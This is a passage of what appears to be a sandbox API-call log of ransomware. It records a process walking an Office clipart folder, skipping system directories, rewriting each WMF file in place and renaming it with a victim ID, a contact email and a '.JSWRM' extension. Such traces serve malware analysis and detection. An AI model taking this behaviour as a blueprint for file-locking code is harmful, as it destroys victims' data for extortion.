lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.166] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0195342.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0195342.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.166] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0087.166] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0087.166] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0087.166] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.166] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.166] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0087.166] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195342.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195342.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.167] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=21328) returned 1 [0087.167] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.167] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5350) returned 0x24d210 [0087.168] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x5350, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x5350, lpOverlapped=0x0) returned 1 [0087.181] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.181] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x5350, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x5350, lpOverlapped=0x0) returned 1 [0087.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0087.181] CloseHandle (hObject=0x314) returned 1 [0087.182] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0087.182] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.182] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0087.182] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.182] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0087.182] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0087.182] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.182] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0087.182] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.182] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0087.182] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0087.182] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0087.182] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0087.182] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0087.182] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195342.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195342.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195342.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195342.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0087.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0087.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0087.183] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb62536, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb62536, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb62536, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x48be, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0195428.WMF", cAlternateFileName="")) returned 1 [0087.183] lstrcmpiW (lpString1="J0195428.WMF", lpString2=".") returned 1 [0087.183] lstrcmpiW (lpString1="J0195428.WMF", lpString2="..") returned 1 [0087.183] lstrcmpiW (lpString1="J0195428.WMF", lpString2="...") returned 1 [0087.183] lstrcmpiW (lpString1="J0195428.WMF", lpString2="windows") returned -1 [0087.183] lstrcmpiW (lpString1="J0195428.WMF", lpString2="recovery") returned -1 [0087.183] lstrcmpiW (lpString1="J0195428.WMF", lpString2="perflogs") returned -1 [0087.183] lstrcmpiW (lpString1="J0195428.WMF", lpString2="documents and settings") returned 1 [0087.183] lstrcmpiW (lpString1="J0195428.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.183] lstrcmpiW (lpString1="J0195428.WMF", lpString2="system volume information") returned -1 [0087.183] lstrcmpiW (lpString1="J0195428.WMF", lpString2="msocache") returned -1 [0087.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0087.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0195428.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0195428.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0195428.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0087.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0087.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0195428.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0195428.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0195428.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0087.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0087.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0087.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0087.184] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195428.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195428.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.184] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=18622) returned 1 [0087.184] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.184] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x48b0) returned 0x24d210 [0087.185] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x48b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x48b0, lpOverlapped=0x0) returned 1 [0087.188] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.188] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x48b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x48b0, lpOverlapped=0x0) returned 1 [0087.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0087.189] CloseHandle (hObject=0x314) returned 1 [0087.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0087.189] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0087.189] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0087.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0087.189] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0087.189] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0087.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0087.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0087.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0087.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0087.189] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195428.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195428.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195428.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195428.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0087.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0087.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0087.190] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb62536, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb62536, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb62536, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe60, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0195772.WMF", cAlternateFileName="")) returned 1 [0087.190] lstrcmpiW (lpString1="J0195772.WMF", lpString2=".") returned 1 [0087.190] lstrcmpiW (lpString1="J0195772.WMF", lpString2="..") returned 1 [0087.190] lstrcmpiW (lpString1="J0195772.WMF", lpString2="...") returned 1 [0087.190] lstrcmpiW (lpString1="J0195772.WMF", lpString2="windows") returned -1 [0087.190] lstrcmpiW (lpString1="J0195772.WMF", lpString2="recovery") returned -1 [0087.190] lstrcmpiW (lpString1="J0195772.WMF", lpString2="perflogs") returned -1 [0087.190] lstrcmpiW (lpString1="J0195772.WMF", lpString2="documents and settings") returned 1 [0087.190] lstrcmpiW (lpString1="J0195772.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.190] lstrcmpiW (lpString1="J0195772.WMF", lpString2="system volume information") returned -1 [0087.190] lstrcmpiW (lpString1="J0195772.WMF", lpString2="msocache") returned -1 [0087.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0087.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0195772.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0195772.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0195772.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0087.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0087.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0195772.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0195772.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0195772.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0087.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0087.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0087.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0087.191] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195772.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195772.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.191] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3680) returned 1 [0087.191] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe60) returned 0x23fc98 [0087.191] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xe60, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xe60, lpOverlapped=0x0) returned 1 [0087.193] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.193] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xe60, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xe60, lpOverlapped=0x0) returned 1 [0087.193] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0087.193] CloseHandle (hObject=0x314) returned 1 [0087.193] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0087.193] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.193] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0087.193] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.193] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0087.193] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0087.193] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.193] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0087.193] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.193] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0087.193] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0087.193] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0087.193] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0087.193] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0087.194] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195772.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195772.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195772.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195772.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0087.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0087.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0087.195] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb62536, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb62536, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb62536, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbbc, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0195788.WMF", cAlternateFileName="")) returned 1 [0087.195] lstrcmpiW (lpString1="J0195788.WMF", lpString2=".") returned 1 [0087.195] lstrcmpiW (lpString1="J0195788.WMF", lpString2="..") returned 1 [0087.195] lstrcmpiW (lpString1="J0195788.WMF", lpString2="...") returned 1 [0087.195] lstrcmpiW (lpString1="J0195788.WMF", lpString2="windows") returned -1 [0087.195] lstrcmpiW (lpString1="J0195788.WMF", lpString2="recovery") returned -1 [0087.195] lstrcmpiW (lpString1="J0195788.WMF", lpString2="perflogs") returned -1 [0087.195] lstrcmpiW (lpString1="J0195788.WMF", lpString2="documents and settings") returned 1 [0087.195] lstrcmpiW (lpString1="J0195788.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.195] lstrcmpiW (lpString1="J0195788.WMF", lpString2="system volume information") returned -1 [0087.195] lstrcmpiW (lpString1="J0195788.WMF", lpString2="msocache") returned -1 [0087.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0087.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0195788.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0195788.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0195788.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0087.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0087.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0195788.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0195788.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0195788.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0087.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0087.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0087.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0087.195] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195788.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195788.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.196] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3004) returned 1 [0087.196] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbb0) returned 0x23fc98 [0087.196] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xbb0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, 